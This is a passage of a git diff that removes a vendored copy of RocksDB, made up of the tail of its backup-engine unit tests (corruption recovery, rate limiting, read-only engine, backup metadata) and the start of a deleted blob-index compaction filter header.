-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  // should not open 00010.sst - it's already there
-
-  should_have_written = {"/shared/00015.sst.tmp", "/private/2.tmp/CURRENT",
-                         "/private/2.tmp/MANIFEST-01",
-                         "/private/2.tmp/00011.log", "/meta/2.tmp"};
-  AppendPath(backupdir_, should_have_written);
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  ASSERT_OK(backup_engine_->DeleteBackup(1));
-  ASSERT_OK(test_backup_env_->FileExists(backupdir_ + "/shared/00010.sst"));
-
-  // 00011.sst was only in backup 1, should be deleted
-  ASSERT_EQ(Status::NotFound(),
-            test_backup_env_->FileExists(backupdir_ + "/shared/00011.sst"));
-  ASSERT_OK(test_backup_env_->FileExists(backupdir_ + "/shared/00015.sst"));
-
-  // MANIFEST file size should be only 100
-  uint64_t size;
-  test_backup_env_->GetFileSize(backupdir_ + "/private/2/MANIFEST-01", &size);
-  ASSERT_EQ(100UL, size);
-  test_backup_env_->GetFileSize(backupdir_ + "/shared/00015.sst", &size);
-  ASSERT_EQ(200UL, size);
-
-  CloseDBAndBackupEngine();
-}
-
-// test various kind of corruptions that may happen:
-// 1. Not able to write a file for backup - that backup should fail,
-//      everything else should work
-// 2. Corrupted backup meta file or missing backuped file - we should
-//      not be able to open that backup, but all other backups should be
-//      fine
-// 3. Corrupted checksum value - if the checksum is not a valid uint32_t,
-//      db open should fail, otherwise, it aborts during the restore process.
-TEST_F(BackupableDBTest, CorruptionsTest) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-
-  // ---------- case 1. - fail a write -----------
-  // try creating backup 6, but fail a write
-  FillDB(db_.get(), keys_iteration * 5, keys_iteration * 6);
-  test_backup_env_->SetLimitWrittenFiles(2);
-  // should fail
-  s = backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2));
-  ASSERT_TRUE(!s.ok());
-  test_backup_env_->SetLimitWrittenFiles(1000000);
-  // latest backup should have all the keys
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration * 5, keys_iteration * 6);
-
-  // --------- case 2. corrupted backup meta or missing backuped file ----
-  ASSERT_OK(file_manager_->CorruptFile(backupdir_ + "/meta/5", 3));
-  // since 5 meta is now corrupted, latest backup should be 4
-  AssertBackupConsistency(0, 0, keys_iteration * 4, keys_iteration * 5);
-  OpenBackupEngine();
-  s = backup_engine_->RestoreDBFromBackup(5, dbname_, dbname_);
-  ASSERT_TRUE(!s.ok());
-  CloseBackupEngine();
-  ASSERT_OK(file_manager_->DeleteRandomFileInDir(backupdir_ + "/private/4"));
-  // 4 is corrupted, 3 is the latest backup now
-  AssertBackupConsistency(0, 0, keys_iteration * 3, keys_iteration * 5);
-  OpenBackupEngine();
-  s = backup_engine_->RestoreDBFromBackup(4, dbname_, dbname_);
-  CloseBackupEngine();
-  ASSERT_TRUE(!s.ok());
-
-  // --------- case 3. corrupted checksum value ----
-  ASSERT_OK(file_manager_->CorruptChecksum(backupdir_ + "/meta/3", false));
-  // checksum of backup 3 is an invalid value, this can be detected at
-  // db open time, and it reverts to the previous backup automatically
-  AssertBackupConsistency(0, 0, keys_iteration * 2, keys_iteration * 5);
-  // checksum of the backup 2 appears to be valid, this can cause checksum
-  // mismatch and abort restore process
-  ASSERT_OK(file_manager_->CorruptChecksum(backupdir_ + "/meta/2", true));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  OpenBackupEngine();
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  s = backup_engine_->RestoreDBFromBackup(2, dbname_, dbname_);
-  ASSERT_TRUE(!s.ok());
-
-  // make sure that no corrupt backups have actually been deleted!
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/1"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/3"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/4"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/1"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/2"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/3"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/4"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/5"));
-
-  // delete the corrupt backups and then make sure they're actually deleted
-  ASSERT_OK(backup_engine_->DeleteBackup(5));
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->DeleteBackup(3));
-  ASSERT_OK(backup_engine_->DeleteBackup(2));
-  (void)backup_engine_->GarbageCollect();
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/5"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/4"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/4"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/3"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/3"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/2"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/2"));
-
-  CloseBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration * 1, keys_iteration * 5);
-
-  // new backup should be 2!
-  OpenDBAndBackupEngine();
-  FillDB(db_.get(), keys_iteration * 1, keys_iteration * 2);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(2, 0, keys_iteration * 2, keys_iteration * 5);
-}
-
-TEST_F(BackupableDBTest, InterruptCreationTest) {
-  // Interrupt backup creation by failing new writes and failing cleanup of the
-  // partial state. Then verify a subsequent backup can still succeed.
-  const int keys_iteration = 5000;
-  Random rnd(6);
-
-  OpenDBAndBackupEngine(true /* destroy_old_data */);
-  FillDB(db_.get(), 0, keys_iteration);
-  test_backup_env_->SetLimitWrittenFiles(2);
-  test_backup_env_->SetDeleteFileFailure(true);
-  // should fail creation
-  ASSERT_FALSE(
-      backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)).ok());
-  CloseDBAndBackupEngine();
-  // should also fail cleanup so the tmp directory stays behind
-  ASSERT_OK(backup_chroot_env_->FileExists(backupdir_ + "/private/1.tmp/"));
-
-  OpenDBAndBackupEngine(false /* destroy_old_data */);
-  test_backup_env_->SetLimitWrittenFiles(1000000);
-  test_backup_env_->SetDeleteFileFailure(false);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  // latest backup should have all the keys
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration);
-}
-
-inline std::string OptionsPath(std::string ret, int backupID) {
-  ret += "/private/";
-  ret += std::to_string(backupID);
-  ret += "/";
-  return ret;
-}
-
-// Backup the LATEST options file to
-// "<backup_dir>/private/<backup_id>/OPTIONS<number>"
-
-TEST_F(BackupableDBTest, BackupOptions) {
-  OpenDBAndBackupEngine(true);
-  for (int i = 1; i < 5; i++) {
-    std::string name;
-    std::vector<std::string> filenames;
-    // Must reset() before reset(OpenDB()) again.
-    // Calling OpenDB() while *db_ is existing will cause LOCK issue
-    db_.reset();
-    db_.reset(OpenDB());
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-    rocksdb::GetLatestOptionsFileName(db_->GetName(), options_.env, &name);
-    ASSERT_OK(file_manager_->FileExists(OptionsPath(backupdir_, i) + name));
-    backup_chroot_env_->GetChildren(OptionsPath(backupdir_, i), &filenames);
-    for (auto fn : filenames) {
-      if (fn.compare(0, 7, "OPTIONS") == 0) {
-        ASSERT_EQ(name, fn);
-      }
-    }
-  }
-
-  CloseDBAndBackupEngine();
-}
-
-// This test verifies we don't delete the latest backup when read-only option is
-// set
-TEST_F(BackupableDBTest, NoDeleteWithReadOnly) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-  CloseDBAndBackupEngine();
-  ASSERT_OK(file_manager_->WriteToFile(backupdir_ + "/LATEST_BACKUP", "4"));
-
-  backupable_options_->destroy_old_data = false;
-  BackupEngineReadOnly* read_only_backup_engine;
-  ASSERT_OK(BackupEngineReadOnly::Open(backup_chroot_env_.get(),
-                                       *backupable_options_,
-                                       &read_only_backup_engine));
-
-  // assert that data from backup 5 is still here (even though LATEST_BACKUP
-  // says 4 is latest)
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/5"));
-
-  // Behavior change: We now ignore LATEST_BACKUP contents. This means that
-  // we should have 5 backups, even if LATEST_BACKUP says 4.
-  std::vector<BackupInfo> backup_info;
-  read_only_backup_engine->GetBackupInfo(&backup_info);
-  ASSERT_EQ(5UL, backup_info.size());
-  delete read_only_backup_engine;
-}
-
-TEST_F(BackupableDBTest, FailOverwritingBackups) {
-  options_.write_buffer_size = 1024 * 1024 * 1024;  // 1GB
-  options_.disable_auto_compactions = true;
-
-  // create backups 1, 2, 3, 4, 5
-  OpenDBAndBackupEngine(true);
-  for (int i = 0; i < 5; ++i) {
-    CloseDBAndBackupEngine();
-    DeleteLogFiles();
-    OpenDBAndBackupEngine(false);
-    FillDB(db_.get(), 100 * i, 100 * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  // restore 3
-  OpenBackupEngine();
-  ASSERT_OK(backup_engine_->RestoreDBFromBackup(3, dbname_, dbname_));
-  CloseBackupEngine();
-
-  OpenDBAndBackupEngine(false);
-  FillDB(db_.get(), 0, 300);
-  Status s = backup_engine_->CreateNewBackup(db_.get(), true);
-  // the new backup fails because new table files
-  // clash with old table files from backups 4 and 5
-  // (since write_buffer_size is huge, we can be sure that
-  // each backup will generate only one sst file and that
-  // a file generated by a new backup is the same as
-  // sst file generated by backup 4)
-  ASSERT_TRUE(s.IsCorruption());
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->DeleteBackup(5));
-  // now, the backup can succeed
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  CloseDBAndBackupEngine();
-}
-
-TEST_F(BackupableDBTest, NoShareTableFiles) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngine(true, false, false);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(i % 2)));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-}
-
-// Verify that you can backup and restore with share_files_with_checksum on
-TEST_F(BackupableDBTest, ShareTableFilesWithChecksums) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, true);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(i % 2)));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-}
-
-// Verify that you can backup and restore using share_files_with_checksum set to
-// false and then transition this option to true
-TEST_F(BackupableDBTest, ShareTableFilesWithChecksumsTransition) {
-  const int keys_iteration = 5000;
-  // set share_files_with_checksum to false
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, false);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-
-  // set share_files_with_checksum to true and do some more backups
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, true);
-  for (int i = 5; i < 10; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 5 + 1),
-                            keys_iteration * 11);
-  }
-}
-
-TEST_F(BackupableDBTest, DeleteTmpFiles) {
-  for (bool shared_checksum : {false, true}) {
-    if (shared_checksum) {
-      OpenDBAndBackupEngineShareWithChecksum(
-          false /* destroy_old_data */, false /* dummy */,
-          true /* share_table_files */, true /* share_with_checksums */);
-    } else {
-      OpenDBAndBackupEngine();
-    }
-    CloseDBAndBackupEngine();
-    std::string shared_tmp = backupdir_;
-    if (shared_checksum) {
-      shared_tmp += "/shared_checksum";
-    } else {
-      shared_tmp += "/shared";
-    }
-    shared_tmp += "/00006.sst.tmp";
-    std::string private_tmp_dir = backupdir_ + "/private/10.tmp";
-    std::string private_tmp_file = private_tmp_dir + "/00003.sst";
-    file_manager_->WriteToFile(shared_tmp, "tmp");
-    file_manager_->CreateDir(private_tmp_dir);
-    file_manager_->WriteToFile(private_tmp_file, "tmp");
-    ASSERT_OK(file_manager_->FileExists(private_tmp_dir));
-    if (shared_checksum) {
-      OpenDBAndBackupEngineShareWithChecksum(
-          false /* destroy_old_data */, false /* dummy */,
-          true /* share_table_files */, true /* share_with_checksums */);
-    } else {
-      OpenDBAndBackupEngine();
-    }
-    // Need to call this explicitly to delete tmp files
-    (void)backup_engine_->GarbageCollect();
-    CloseDBAndBackupEngine();
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(shared_tmp));
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(private_tmp_file));
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(private_tmp_dir));
-  }
-}
-
-TEST_F(BackupableDBTest, KeepLogFiles) {
-  backupable_options_->backup_log_files = false;
-  // basically infinite
-  options_.WAL_ttl_seconds = 24 * 60 * 60;
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 100, 200);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  FillDB(db_.get(), 200, 300);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 300, 400);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 400, 500);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  CloseDBAndBackupEngine();
-
-  // all data should be there if we call with keep_log_files = true
-  AssertBackupConsistency(0, 0, 500, 600, true);
-}
-
-TEST_F(BackupableDBTest, RateLimiting) {
-  size_t const kMicrosPerSec = 1000 * 1000LL;
-  uint64_t const MB = 1024 * 1024;
-
-  const std::vector<std::pair<uint64_t, uint64_t>> limits(
-      {{1 * MB, 5 * MB}, {2 * MB, 3 * MB}});
-
-  std::shared_ptr<RateLimiter> backupThrottler(NewGenericRateLimiter(1));
-  std::shared_ptr<RateLimiter> restoreThrottler(NewGenericRateLimiter(1));
-
-  for (bool makeThrottler : {false, true}) {
-    if (makeThrottler) {
-      backupable_options_->backup_rate_limiter = backupThrottler;
-      backupable_options_->restore_rate_limiter = restoreThrottler;
-    }
-    // iter 0 -- single threaded
-    // iter 1 -- multi threaded
-    for (int iter = 0; iter < 2; ++iter) {
-      for (const auto& limit : limits) {
-        // destroy old data
-        DestroyDB(dbname_, Options());
-        if (makeThrottler) {
-          backupThrottler->SetBytesPerSecond(limit.first);
-          restoreThrottler->SetBytesPerSecond(limit.second);
-        } else {
-          backupable_options_->backup_rate_limit = limit.first;
-          backupable_options_->restore_rate_limit = limit.second;
-        }
-        backupable_options_->max_background_operations = (iter == 0) ? 1 : 10;
-        options_.compression = kNoCompression;
-        OpenDBAndBackupEngine(true);
-        size_t bytes_written = FillDB(db_.get(), 0, 100000);
-
-        auto start_backup = db_chroot_env_->NowMicros();
-        ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-        auto backup_time = db_chroot_env_->NowMicros() - start_backup;
-        auto rate_limited_backup_time =
-            (bytes_written * kMicrosPerSec) / limit.first;
-        ASSERT_GT(backup_time, 0.8 * rate_limited_backup_time);
-
-        CloseDBAndBackupEngine();
-
-        OpenBackupEngine();
-        auto start_restore = db_chroot_env_->NowMicros();
-        ASSERT_OK(backup_engine_->RestoreDBFromLatestBackup(dbname_, dbname_));
-        auto restore_time = db_chroot_env_->NowMicros() - start_restore;
-        CloseBackupEngine();
-        auto rate_limited_restore_time =
-            (bytes_written * kMicrosPerSec) / limit.second;
-        ASSERT_GT(restore_time, 0.8 * rate_limited_restore_time);
-
-        AssertBackupConsistency(0, 0, 100000, 100010);
-      }
-    }
-  }
-}
-
-TEST_F(BackupableDBTest, ReadOnlyBackupEngine) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  FillDB(db_.get(), 100, 200);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-
-  backupable_options_->destroy_old_data = false;
-  test_backup_env_->ClearWrittenFiles();
-  test_backup_env_->SetLimitDeleteFiles(0);
-  BackupEngineReadOnly* read_only_backup_engine;
-  ASSERT_OK(BackupEngineReadOnly::Open(
-      db_chroot_env_.get(), *backupable_options_, &read_only_backup_engine));
-  std::vector<BackupInfo> backup_info;
-  read_only_backup_engine->GetBackupInfo(&backup_info);
-  ASSERT_EQ(backup_info.size(), 2U);
-
-  RestoreOptions restore_options(false);
-  ASSERT_OK(read_only_backup_engine->RestoreDBFromLatestBackup(
-      dbname_, dbname_, restore_options));
-  delete read_only_backup_engine;
-  std::vector<std::string> should_have_written;
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  DB* db = OpenDB();
-  AssertExists(db, 0, 200);
-  delete db;
-}
-
-TEST_F(BackupableDBTest, ProgressCallbackDuringBackup) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  bool is_callback_invoked = false;
-  ASSERT_OK(backup_engine_->CreateNewBackup(
-      db_.get(), true,
-      [&is_callback_invoked]() { is_callback_invoked = true; }));
-
-  ASSERT_TRUE(is_callback_invoked);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, GarbageCollectionBeforeBackup) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-
-  backup_chroot_env_->CreateDirIfMissing(backupdir_ + "/shared");
-  std::string file_five = backupdir_ + "/shared/000007.sst";
-  std::string file_five_contents = "I'm not really a sst file";
-  // this depends on the fact that 00007.sst is the first file created by the DB
-  ASSERT_OK(file_manager_->WriteToFile(file_five, file_five_contents));
-
-  FillDB(db_.get(), 0, 100);
-  // backup overwrites file 000007.sst
-  ASSERT_TRUE(backup_engine_->CreateNewBackup(db_.get(), true).ok());
-
-  std::string new_file_five_contents;
-  ASSERT_OK(ReadFileToString(backup_chroot_env_.get(), file_five,
-                             &new_file_five_contents));
-  // file 000007.sst was overwritten
-  ASSERT_TRUE(new_file_five_contents != file_five_contents);
-
-  CloseDBAndBackupEngine();
-
-  AssertBackupConsistency(0, 0, 100);
-}
-
-// Test that we properly propagate Env failures
-TEST_F(BackupableDBTest, EnvFailures) {
-  BackupEngine* backup_engine;
-
-  // get children failure
-  {
-    test_backup_env_->SetGetChildrenFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetGetChildrenFailure(false);
-  }
-
-  // created dir failure
-  {
-    test_backup_env_->SetCreateDirIfMissingFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetCreateDirIfMissingFailure(false);
-  }
-
-  // new directory failure
-  {
-    test_backup_env_->SetNewDirectoryFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetNewDirectoryFailure(false);
-  }
-
-  // Read from meta-file failure
-  {
-    DestroyDB(dbname_, options_);
-    OpenDBAndBackupEngine(true);
-    FillDB(db_.get(), 0, 100);
-    ASSERT_TRUE(backup_engine_->CreateNewBackup(db_.get(), true).ok());
-    CloseDBAndBackupEngine();
-    test_backup_env_->SetDummySequentialFile(true);
-    test_backup_env_->SetDummySequentialFileFailReads(true);
-    backupable_options_->destroy_old_data = false;
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetDummySequentialFile(false);
-    test_backup_env_->SetDummySequentialFileFailReads(false);
-  }
-
-  // no failure
-  {
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    delete backup_engine;
-  }
-}
-
-// Verify manifest can roll while a backup is being created with the old
-// manifest.
-TEST_F(BackupableDBTest, ChangeManifestDuringBackupCreation) {
-  DestroyDB(dbname_, options_);
-  options_.max_manifest_file_size = 0;  // always rollover manifest for file add
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-       "VersionSet::LogAndApply:WriteManifest"},
-      {"VersionSet::LogAndApply:WriteManifestDone",
-       "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread flush_thread{[this]() { ASSERT_OK(db_->Flush(FlushOptions())); }};
-
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-
-  flush_thread.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // The last manifest roll would've already been cleaned up by the full scan
-  // that happens when CreateNewBackup invokes EnableFileDeletions. We need to
-  // trigger another roll to verify non-full scan purges stale manifests.
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_.get());
-  std::string prev_manifest_path =
-      DescriptorFileName(dbname_, db_impl->TEST_Current_Manifest_FileNo());
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(db_chroot_env_->FileExists(prev_manifest_path));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_TRUE(db_chroot_env_->FileExists(prev_manifest_path).IsNotFound());
-
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-  AssertBackupConsistency(0, 0, 100);
-}
-
-// see https://github.com/facebook/rocksdb/issues/921
-TEST_F(BackupableDBTest, Issue921Test) {
-  BackupEngine* backup_engine;
-  backupable_options_->share_table_files = false;
-  backup_chroot_env_->CreateDirIfMissing(backupable_options_->backup_dir);
-  backupable_options_->backup_dir += "/new_dir";
-  ASSERT_OK(BackupEngine::Open(backup_chroot_env_.get(), *backupable_options_,
-                               &backup_engine));
-
-  delete backup_engine;
-}
-
-TEST_F(BackupableDBTest, BackupWithMetadata) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    const std::string metadata = std::to_string(i);
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(
-        backup_engine_->CreateNewBackupWithMetadata(db_.get(), metadata, true));
-  }
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(5, backup_infos.size());
-  for (int i = 0; i < 5; i++) {
-    ASSERT_EQ(std::to_string(i), backup_infos[i].app_metadata);
-  }
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, BinaryMetadata) {
-  OpenDBAndBackupEngine(true);
-  std::string binaryMetadata = "abc\ndef";
-  binaryMetadata.push_back('\0');
-  binaryMetadata.append("ghi");
-  ASSERT_OK(
-      backup_engine_->CreateNewBackupWithMetadata(db_.get(), binaryMetadata));
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(1, backup_infos.size());
-  ASSERT_EQ(binaryMetadata, backup_infos[0].app_metadata);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, MetadataTooLarge) {
-  OpenDBAndBackupEngine(true);
-  std::string largeMetadata(1024 * 1024 + 1, 0);
-  ASSERT_NOK(
-      backup_engine_->CreateNewBackupWithMetadata(db_.get(), largeMetadata));
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, LimitBackupsOpened) {
-  // Verify the specified max backups are opened, including skipping over
-  // corrupted backups.
-  //
-  // Setup:
-  // - backups 1, 2, and 4 are valid
-  // - backup 3 is corrupt
-  // - max_valid_backups_to_open == 2
-  //
-  // Expectation: the engine opens backups 4 and 2 since those are latest two
-  // non-corrupt backups.
-  const int kNumKeys = 5000;
-  OpenDBAndBackupEngine(true);
-  for (int i = 1; i <= 4; ++i) {
-    FillDB(db_.get(), kNumKeys * i, kNumKeys * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-    if (i == 3) {
-      ASSERT_OK(file_manager_->CorruptFile(backupdir_ + "/meta/3", 3));
-    }
-  }
-  CloseDBAndBackupEngine();
-
-  backupable_options_->max_valid_backups_to_open = 2;
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(2, backup_infos.size());
-  ASSERT_EQ(2, backup_infos[0].backup_id);
-  ASSERT_EQ(4, backup_infos[1].backup_id);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-}  // anon namespace
-
-} //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as BackupableDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h b/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h
deleted file mode 100644
index 26cd188..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h
+++ /dev/null
@@ -1,78 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-// CompactionFilter to delete expired blob index from base DB.
-class BlobIndexCompactionFilter : public CompactionFilter {
- public:
-  explicit BlobIndexCompactionFilter(uint64_t current_time)
-      : current_time_(current_time) {}
-
-  virtual const char* Name() const override {
-    return "BlobIndexCompactionFilter";
-  }
-
-  // Filter expired blob indexes regardless of snapshots.
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual Decision FilterV2(int /*level*/, const Slice& /*key*/,
-                            ValueType value_type, const Slice& value,
-                            std::string* /*new_value*/,
-                            std::string* /*skip_until*/) const override {
-    if (value_type != kBlobIndex) {
-      return Decision::kKeep;
-    }
-    BlobIndex blob_index;
-    Status s = blob_index.DecodeFrom(value);
-    if (!s.ok()) {
-      // Unable to decode blob index. Keeping the value.
-      return Decision::kKeep;
-    }
-    if (blob_index.HasTTL() && blob_index.expiration() <= current_time_) {
-      // Expired
-      return Decision::kRemove;
-    }
-    return Decision::kKeep;
-  }
-
- private:
-  const uint64_t current_time_;
-};
-
-class BlobIndexCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit BlobIndexCompactionFilterFactory(Env* env) : env_(env) {}
-
-  virtual const char* Name() const override {
